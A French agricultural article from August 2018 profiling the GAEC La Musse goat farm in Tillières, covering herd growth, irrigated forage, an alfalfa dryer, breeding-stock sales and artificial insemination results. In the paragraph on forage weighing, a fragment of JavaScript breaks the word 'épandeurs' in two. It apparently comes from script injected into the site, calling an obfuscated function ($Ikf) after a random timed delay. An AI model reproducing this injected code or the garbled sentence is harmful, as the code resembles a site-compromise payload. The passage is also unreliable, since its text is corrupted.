26 août 2018

Gaec La Musse Elevage Capgènes fournisseur historique de Chevrettes de France

La commune de Tillières dans le Maine et Loire est plus connue pour son muscadet que pour ses chèvres, et pourtant…

Au milieu des vignes, Joël, Hervé, Anthony et Guillaume GRIFFON « cultivent » la passion de l’élevage dans cette région viticole mais de nombreuses contraintes, quotas, peu de perspectives de développement, mise aux normes coûteuse, ont amené au hasard d’une rencontre, Joël et Hervé a orienté l’exploitation sur le lait de chèvre. Le choix d’une production dynamique, en plein développement et permettant de conserver les mêmes objectifs : travailler la génétique et la qualité des fourrages. Quelques mois de réflexion avec leur coopérative puis 323 chevrettes indemnes de CAEV issues de 4 troupeaux adhérents à Capgènes sont achetées et une chèvrerie de 400 places construite.

En 10 ans, le troupeau est passé de 400 à 800 chèvres et les objectifs sont restés les mêmes. « Adhérent à Capgènes depuis 1995, la meilleure façon de valoriser la génétique c’est de travailler la qualité des fourrages et vendre des reproducteurs » selon Joël.

La qualité des fourrages : les cultures maïs et luzerne sont irriguées. Le GAEC LA MUSSE a investi en 2008 dans un séchoir « Clim’Air 16 bottes » pour maîtriser le stade de récolte de la luzerne, puis au printemps 2013, dans un pont bascule. Tous les fourrages de la récolte à la distribution sont pesés ainsi que les épandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeurs de fumier pour optimiser le plan de fumure.

La revente des reproducteurs : la confiance acquise avec leur coopérative laitière, ils l’ont également avec CHEVRETTES DE FRANCE. La vente de 200 chevrettes filiées leur permet chaque année d’investir dans la génétique.

Sur 800 chèvres, 650 sont inséminées  en I.A. congelée avec un taux de réussite compris entre 75 et 85 %.